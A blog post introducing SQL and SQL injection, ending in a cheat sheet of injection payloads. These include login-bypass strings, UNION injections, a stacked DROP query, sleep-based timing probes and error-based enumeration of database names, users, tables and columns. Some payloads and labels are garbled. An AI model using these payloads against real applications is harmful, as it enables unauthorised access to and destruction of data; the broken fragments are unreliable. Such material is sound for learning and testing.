A Detailed Report on SQL INJECTION

ks1912

Kunal Singh

Posted on October 11, 2021

A Detailed Report on
SQL INJECTION

What is SQL?

SQL is a language that is used to access and manipulate databases or relational databases.
SQL is also known as Structured Query Language.
SQL became a standard of the American National Standards Institute (ANSI) in 1986, and the International Organization for Standardization (ISO) in 1987.
Some common relational database management systems that use SQL are Oracle, Sybase, Microsoft SQL Server, Microsoft Access, Ingres, etc.
SQL is majorly used in websites that we create where SQL works in the backend to store the data of the customer.
SQL comes in many versions and most of them are free to use and we don’t need very high coding skills to use SQL.
SQL has some drawbacks too like some versions of SQL are expensive and due to hidden business rules completed access is not given to the database.
We can use SQL to perform certain operations on the existing database and also we can use this language to create a database. SQL uses certain commands like Create, Drop, Insert, etc. to carry out the required tasks.
These SQL commands are mainly categorized into four categories as:
DDL – Data Definition Language
DQL – Data Query Language
DML – Data Manipulation Language
TCL – Data Control Language
Data Definition Language (DDL) is the commands that are used to define the schema.
Data Query Language (DQL) are the commands that are used to perform queries on the data within schema objects.
Data Manipulation Language (DML) is the commands that are used for the manipulation of data present in the database.
Transaction Control Language (TCL) are the commands that are used for giving and taking rights, permissions, and other controls of the database system.
SQL join:

What is SQL Injection (SQLi)?
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve.
A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system.
Generally, SQLi happens in WEB APIs where the data is being sent to the databases either by GET method or by POST method.
Suppose if we are sending data to the database by GET method it is easy to add some malicious data in URL where is if the data is being sent by POST method we can not see what is being sent and so we need something to intercept the POST based request and give us the request that is being sent to the server/database.
To intercept POST-based requests we use Burpsuit.
The risk factor of SQLi is high/critical as it can reveal some sensitive data of the user to the attacker and may compromise in any kind of backdoor a
SQL/ SQL Injection Cheat Sheet
SELECT c1, c2 FROM t; Query data in columns c1, c2 from a table
SELECT * FROM t; Query all rows and columns from a table
SELECT c1, c2 FROM t WHERE condition; Query data and filter rows with a condition
SELECT DISTINCT c1 FROM t WHERE condition; Query distinct rows from a table
SELECT c1, aggregate(c2) FROM t GROUP BY c1; Group rows using an aggregate function
SELECT c1, aggregate(c2) FROM t GROUP BY c1 HAVING condition; Filter groups using HAVING clause
SELECT c1, c2 FROM t ORDER BY c1 ASC [DESC]; Sort the result set in ascending or descending
Order SELECT c1, c2 FROM t1 UNION [ALL] SELECT c1, c2 FROM t2; Combine rows from two queries
SELECT c1, c2 FROM t1 INTERSECT SELECT c1, c2 FROM t2; Return the intersection of two queries
SELECT c1, c2 FROM t1 MINUS SELECT c1, c2 FROM t2; Subtract a result set from another result set
SELECT c1, c2 FROM t1 WHERE c1 [NOT] LIKE pattern; Query rows using pattern matching %, _
SELECT c1, c2 FROM t WHERE c1 [NOT] IN value_list; Query rows in a list
SELECT c1, c2 FROM t WHERE c1 BETWEEN low AND high; Query rows between two values
SELECT c1, c2 FROM t WHERE c1 IS [NOT] NULL; Check if values in a table is NULL or not
QUERYING DATA FROM A TABLE QUERYING FROM MULTIPLE TABLES USING SQL OPERATORS SELECT c1, c2 FROM t ORDER BY c1 LIMIT n OFFSET offset; Skip offset of rows and return the next n rows
SELECT c1, c2 FROM t1 INNER JOIN t2 ON condition; Inner join t1 and t2
SELECT c1, c2 FROM t1 LEFT JOIN t2 ON condition; Left join t1 and t1
SELECT c1, c2 FROM t1 FULL OUTER JOIN t2 ON condition; Perform full outer join
SELECT c1, c2 FROM t1 CROSS JOIN t2; Produce a Cartesian product of rows in tables
SELECT c1, c2 FROM t1 A INNER JOIN t2 B ON condition; Join t1 to itself using INNER JOIN clause
INSERT INTO t(column_list) VALUES(value_list); Insert one row into a table
INSERT INTO t(column_list) VALUES (value_list), (value_list), ….;
Insert multiple rows into a table

INSERT INTO t1(column_list) SELECT column_list FROM t2; Insert rows from t2 into t1
UPDATE t SET c1 = new_value, c2 = new_value WHERE condition; Update values in the column c1, c2 that match the condition
DELETE FROM t; Delete all data in a table
DELETE FROM t WHERE condition; Delete subset of rows in a table
UPDATE t SET c1 = new_value; Update new value in the column c1 for all rows
Ending / Commenting Out / Line Comments
Username: admin'--
This is going to log you as the admin, user because the rest of the SQL query will be ignored.
SELECT*FROM members WHERE username = 'admin'--' AND password = 'password'
Comments out the rest of the query by not closing them or you can use it for bypassing blacklisting, removing spaces, obfuscating and determining database versions. It is known as Inline comment.
SELECT/avoid-spaces/password//FROM//Members
Executing more than one query in one transaction. This is very useful in every injection point, especially in SQL Server back ended applications.
;SELECT * FROM members; DROP members-- Ends a query and starts a new one.
MySQL If Statement
IF(condition,true-part,false-part)
SELECT IF(1=1,'true','false')
If MySQL is running in ANSI mode it's going to work but otherwise, MySQL accepts it as a logical operator it'll return 0. A better way to do it is using the CONCAT()function in MySQL.
CONCAT(str1, str2, str3, ...) Concatenate supplied strings.
SELECT CONCAT(login, password) FROM members
UNION INJECTION:- This will combine results from both the news table and members table and return all of them.
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
Another Example for UNION Injection
'UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
Login ByPass
admin’ #
admin” #
admin’)) #
‘ or 1=1 --+
‘ or 1=1 #
" or " " "
" or true --
" or true --+
‘)) or true -- -
admin' or 1=1 or ''='
admin') or ('1'='1'--
admin') or '1'='1'/*
admin") or "1"="1
') or ('1'='1 --
One or more queries can be executed and their results can be appended to the original query in MySQL using the UNION keyword.
order by 1,sleep(10) --+
‘ union select @@version ,sleep(10),3 --+
‘ union select @@version ,sleep(10),3,"'3'"# --+
Using the UNION keyword, the number of tables in the database can be determined by incrementing the specified table index number until an error occurs.
' order by 3 --+
' order by 4 --+
' order by 5 --+ (if it gives an error means that there are 4 tables)
Getting what columns are displaying the results of a query clearly:
' union select 1,2,3 --+
Getting the database version number:
’ union select 1,database(),3 --+
Error Based:
Count, floor and group functions can be used in order to produce the error. These functions are helpful if MySQL isn’t displaying output via UNION based queries.
(select count(), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)
Enumerating database
‘ AND (select 1 from (select count(
), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()2))a from information_schema.columns group by a)b) --+
Enumerating current user
‘ AND (select 1 from (select count(
), concat(0x3a,0x3a,(select current_user,0x3a,0x3a, floor(rand()2))a from information_schema.columns group by a)b) --+
Enumerating table names,
‘ AND (select 1 from (select count(
), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x3a,0x3a, floor(rand()2))a from information_schema.columns group by a)b) --+
Enumerating column names
‘ AND (select 1 from (select count(
), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
References
https://www.geeksforgeeks.org/sql-ddl-dml-tcl-dcl/
https://www.geeksforgeeks.org/sql-ddl-dql-dml-dcl-tcl-commands/
https://www.w3schools.com/sql/sql_injection.asp
https://portswigger.net/web-security/sql-injection
https://owasp.org/www-community/attacks/SQL_Injection
https://portswigger.net/web-security/sql-injection/cheat-sheet
https://www.sqltutorial.org/wp-content/uploads/2016/04/SQL-cheat-sheet.pdf
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
https://www.hackingloops.com/sql-injection-cheat-sheet/

💖 💪 🙅 🚩
ks1912
Kunal Singh

Posted on October 11, 2021

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related

A Detailed Report on
SQL INJECTION
cybersecurity A Detailed Report on SQL INJECTION

October 11, 2021